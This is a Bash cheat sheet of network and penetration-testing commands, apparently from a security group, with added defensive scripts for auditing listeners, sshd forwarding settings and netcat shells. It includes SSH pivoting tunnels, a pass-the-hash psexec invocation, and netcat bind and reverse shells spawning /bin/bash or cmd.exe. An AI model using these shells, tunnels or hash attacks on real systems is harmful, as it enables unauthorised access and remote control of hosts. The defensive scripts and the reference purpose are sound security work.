Bash Tips and Tricks
Network Commands
watch ss -tp
Short Description: Monitor network connections in real-time.
Tactics and Techniques: Network Communication
netstat -ant
Short Description: Display TCP connections.
Tactics and Techniques: TCP Communication
netstat -tulpn
Short Description: Display all active connections with PIDs.
Tactics and Techniques: Communication with PIDs
lsof -i
Short Description: List open files related to network connections.
Tactics and Techniques: Established Communication
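The four commands above show connections and the processes behind them; the defender's follow-up is to compare that output against a known baseline. The script below is an added example, not part of the original cheat sheet: it reads `ss -tlnp` output (here a constructed sample, not captured from a real host), extracts process name and port for every LISTEN socket, and prints an ALERT for any pair missing from an assumed allowlist (`sshd:22 nginx:80`). The same check covers ad-hoc listeners such as `nc -lvvp port` or `python3 -m http.server` further down the page, which show up as unexpected process/port pairs.

```shell
#!/bin/sh
# Added example (not from the cheat sheet): flag listening TCP sockets whose
# process:port pair is not on an allowlist. Input format is `ss -tlnp`.

# Assumed baseline for this host; adjust to the real inventory.
ALLOWED_LISTENERS="sshd:22 nginx:80"

# Reads `ss -tlnp` output on stdin, prints one ALERT line per unexpected listener.
flag_unexpected_listeners() {
    awk -v allow="$ALLOWED_LISTENERS" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        $1 == "LISTEN" {
            port = $4; sub(/.*:/, "", port)          # drop the address, keep the port
            proc = "unknown"
            if (match($6, /"[^"]+"/))                # first quoted name in users:(("name",pid=..))
                proc = substr($6, RSTART + 1, RLENGTH - 2)
            if (!((proc ":" port) in ok))
                printf "ALERT unexpected listener %s on port %s (%s)\n", proc, port, $6
        }'
}

# Constructed sample of `ss -tlnp` output (not captured from a real system).
SAMPLE_SS_OUTPUT='State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       511     127.0.0.1:80         0.0.0.0:*          users:(("nginx",pid=1201,fd=6))
LISTEN  0       10      0.0.0.0:4444         0.0.0.0:*          users:(("nc",pid=3310,fd=3))'

# Returns the number of unexpected listeners found in the sample.
count_sample_alerts() {
    printf '%s\n' "$SAMPLE_SS_OUTPUT" | flag_unexpected_listeners | grep -c '^ALERT'
}

# Live use on a host: ss -tlnp | flag_unexpected_listeners
count_sample_alerts
```

Only the `nc` listener on 4444 is reported for the sample. Run it from cron or a watch loop and alert on any ALERT line; the allowlist is the part that needs maintaining, because a stale baseline produces either noise or silence.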
smb://ip/share
Short Description: Access an SMB share through a file-manager URL.
Tactics and Techniques: SMB Shared Environment Access
share user x.x.x.x c$
Short Description: Mount the shared Windows environment.
Tactics and Techniques: Mounting Shared Windows Environment
smbclient -U user \\\\ip\\share
Short Description: Connect to SMB.
Tactics and Techniques: Connect to SMB
ifconfig eth# ip/cidr
Short Description: Set IP and netmask.
Tactics and Techniques: IP and Netmask Setting
ifconfig eth0:1 ip/cidr
Short Description: Create a virtual interface.
Tactics and Techniques: Virtual Interface Setting
route add default gw gw_ip
Short Description: Set the default gateway.
Tactics and Techniques: Set Default Gateway
ifconfig eth# mtu [size]
Short Description: Change the MTU size.
Tactics and Techniques: Change MTU Size
export MAC=xx:XX:XX:XX:XX:XX
Short Description: Change the MAC address.
Tactics and Techniques: Change MAC Address
ifconfig int hw ether MAC
Short Description: Change the MAC address.
Tactics and Techniques: Change MAC Address
macchanger -m MAC int
Short Description: Change MAC address (Backtrack).
Tactics and Techniques: Change MAC in Backtrack
iwlist int scan
Short Description: Wi-Fi scanner.
Tactics and Techniques: Wi-Fi Scanning
nc -lvvp port
Short Description: Listen on a specific port.
Tactics and Techniques: Listening on a Specific Port
python3 -m http.server port
Short Description: Create a web server.
Tactics and Techniques: Create Web Server
dig -x ip
Short Description: Identify the domains of an IP.
Tactics and Techniques: Identify IP Domains
host ip
Short Description: Identify the domains of an IP.
Tactics and Techniques: Identify IP Domains
host -t SRV _service._tcp.url.com
Short Description: Identify domain SRV.
Tactics and Techniques: Identify Domain SRV
dig @ip domain -t AXFR
Short Description: Identify DNS Zone Transfer.
Tactics and Techniques: Identify DNS Zone Transfer
host -l domain namesvr
Short Description: Identify DNS Zone Transfer.
Tactics and Techniques: Identify DNS Zone Transfer
ip xfrm state list
Short Description: Show available VPNs.
Tactics and Techniques: Show Available VPNs
ip addr add ip/cidr dev eth0
Short Description: Add a 'hidden' interface.
Tactics and Techniques: Add Hidden Interface
grep DHCP /var/log/messages
Short Description: List DHCP entries.
Tactics and Techniques: DHCP List
tcpkill host ip and port port
Short Description: Block IP and port.
Tactics and Techniques: Blocking IP and Port
echo "1" > /proc/sys/net/ipv4/ip_forward
Short Description: Enable IP forwarding.
Tactics and Techniques: Enable IP Forwarding
echo "nameserver x.x.x.x" >> /etc/resolv.conf
Short Description: Add DNS server.
Tactics and Techniques: Add DNS Server
showmount -e ip
Short Description: Show the NFS exports (mount points) offered by ip.
Tactics and Techniques: Show Mounted Points
mkdir /site_backups; mount -t nfs ip:/ /site_backups
Short Description: Mount NFS share by IP.
Tactics and Techniques: Mount NFS Share by IP
Configure x11 Forwarding for the Attacker
xhost +
vi ~/.ssh/config   # Ensure 'ForwardX11 yes'
ssh -X root@2.2.2.2
Create Port Forward on Port 8080 and Forward it to Attacker's Port 443
ssh -R8080:127.0.0.1:443 root@2.2.2.2
Use Port Forward on Attacker's Port 8080 and Forward Data using SSH Tunnel to Port 3300 on 3.3.3.3
ssh -L8080:3.3.3.3:443 root@2.2.2.2
Dynamic Tunnel using proxychains. Also, edit /etc/proxychains.conf to set the port (1080)
ssh -D1080 root@2.2.2.2
In a separate terminal, run:
proxychains nmap -sT -p80,443 3.3.3.3
Create SSH Tunnel as Multi-hop
ssh -L 8888:127.0.0.1:8444 50mctf@MY_VPS
ssh -v -o PubkeyAuthentication=no -o PreferredAuthentications=password -o GatewayPorts=yes -fN -R *:8444:172.28.0.3:80 50mctf@MY_VPS
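Every tunnel in this section (-R, -L, -D, -X) depends on the remote sshd permitting it. The following is an added example, not part of the original cheat sheet: a small audit that reads an sshd_config and reports the settings that make those tunnels possible. It assumes the stock defaults from sshd_config(5) when a key is absent (AllowTcpForwarding yes, GatewayPorts no, X11Forwarding no, PermitTunnel no), uses only the `Key value` form, and ignores anything after the first `Match` block because those values are conditional. The config excerpt is constructed for the example.

```shell
#!/bin/sh
# Added example (not from the cheat sheet): audit sshd_config for the settings
# that allow the -R/-L/-D/-X tunnels shown in this section.

# Prints the effective value of one key. $1 = key, $2 = assumed default when the
# key is absent; config text on stdin. sshd uses the FIRST occurrence of a key,
# and keys inside a Match block are conditional, so parsing stops at the first Match.
effective_sshd_setting() {
    awk -v key="$1" -v def="$2" '
        tolower($1) == "match" { in_match = 1 }
        !in_match && !found && tolower($1) == tolower(key) { print tolower($2); found = 1 }
        END { if (!found) print def }'
}

# Reads sshd_config on stdin, prints one RISK line per permissive setting.
audit_sshd_forwarding() {
    cfg=$(cat)
    for spec in "AllowTcpForwarding:yes" "GatewayPorts:no" "X11Forwarding:no" "PermitTunnel:no"; do
        key=${spec%%:*}
        def=${spec#*:}
        val=$(printf '%s\n' "$cfg" | effective_sshd_setting "$key" "$def")
        if [ "$val" != "no" ]; then
            echo "RISK $key=$val (set '$key no' unless this host must relay traffic)"
        fi
    done
}

# Constructed sshd_config excerpt for the example (not from a real host).
SAMPLE_SSHD_CONFIG='# Constructed sshd_config excerpt
Port 22
#AllowTcpForwarding no
GatewayPorts yes
X11Forwarding yes
Match User backup
    AllowTcpForwarding no'

# Returns the number of RISK findings for the sample.
count_sshd_risks() {
    printf '%s\n' "$SAMPLE_SSHD_CONFIG" | audit_sshd_forwarding | grep -c '^RISK'
}

# Live use: audit_sshd_forwarding < /etc/ssh/sshd_config
count_sshd_risks
```

The sample yields three findings: AllowTcpForwarding is only set inside a Match block and in a comment, so the default (yes) applies; GatewayPorts yes lets `-R *:port` bind on all interfaces; X11Forwarding yes enables `ssh -X`. AllowTcpForwarding governs -L, -R and -D alike, so `AllowTcpForwarding no` is the single setting that removes all three on hosts that never need to relay traffic. A full audit also needs `sshd -T`, which prints the effective values after Match processing.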
PTH with Linux
Perform Pass-the-Hash with Linux:
# Install krb5-user package
apt-get install krb5-user
# Set KRB5CCNAME environment variable
export KRB5CCNAME=/tmp/krb5cc_123
# Use proxychains to execute psexec.py
proxychains psexec.py -k -no-pass -debug -dc-ip 10.1.1.2 adm_domain@OPS-CHILDDC
File Transfer
# Sending a file (connects to the port the receiver listens on, 1234 below)
nc.exe 10.10.10.10 1234 < "file.log"
# Receiving a file
nc -vnlp 1234 > file.txt
# Grab a [filename] from a Listener:
# 1. Start Listener to push [filename]
$ nc -l -p [port] < [filename]
# 2. Connect to [TargetIP] and Retrieve [filename]
$ nc -w3 [TargetIP] [port] > [filename]
# Push a [filename] to Listener:
# 1. Start Listener to pull [filename]
$ nc -l -p [port] > [filename]
# 2. Connect to [TargetIP] and push [filename]
$ nc -w3 [TargetIP] [port] < [filename]
Backdoor Shells
# Linux Shell:
$ nc -l -p [port] -e /bin/bash
# Linux Reverse Shell:
$ nc [LocalIP] [port] -e /bin/bash
# Windows Shell:
$ nc -l -p [port] -e cmd.exe
# Windows Reverse Shell:
$ nc [LocalIP] [port] -e cmd.exe
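All four shells above share one observable: a netcat binary running with -e (or -c on some builds). The script below is an added example, not part of the original cheat sheet, that finds that pattern in `ps -eo pid,user,args` output and prints an ALERT per match. The process listing is a constructed sample; the program names checked (nc, ncat, netcat) are an assumption about what is installed on the host.

```shell
#!/bin/sh
# Added example (not from the cheat sheet): detect netcat processes started with
# -e/-c, the bind/reverse-shell pattern shown above. Input: `ps -eo pid,user,args`.

# Reads ps output on stdin, prints one ALERT line per netcat process that
# hands its connection to a program via -e or -c.
flag_nc_shells() {
    awk '
        NR > 1 {
            cmd = $3; sub(/.*\//, "", cmd)              # basename of the executable
            if (cmd ~ /^(nc|ncat|netcat)$/) {
                for (i = 4; i <= NF; i++) {
                    if ($i == "-e" || $i == "-c") {
                        printf "ALERT pid=%s user=%s netcat spawning a program: %s\n", $1, $2, $0
                        break
                    }
                }
            }
        }'
}

# Constructed sample of `ps -eo pid,user,args` output (not from a real host).
SAMPLE_PS_OUTPUT='  PID USER     COMMAND
  812 root     /usr/sbin/sshd -D
 3310 www-data nc -l -p 4444 -e /bin/bash
 3412 alice    nc -zv 10.0.0.5 80
 3520 root     /bin/bash'

# Returns the number of ALERT lines produced for the sample.
count_sample_nc_alerts() {
    printf '%s\n' "$SAMPLE_PS_OUTPUT" | flag_nc_shells | grep -c '^ALERT'
}

# Live use: ps -eo pid,user,args | flag_nc_shells
count_sample_nc_alerts
```

Only pid 3310 is reported; the port scan on pid 3412 uses nc without -e and is left alone. This catches exactly the pattern the cheat sheet shows, so treat it as one signal among several: netcat builds compiled without -e, renamed binaries, and shells opened by other tools need process-ancestry or network-based detection instead.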
Discord: https://discord.gg/CqV6aJXMkA
Telegram: https://t.me/Hadess_security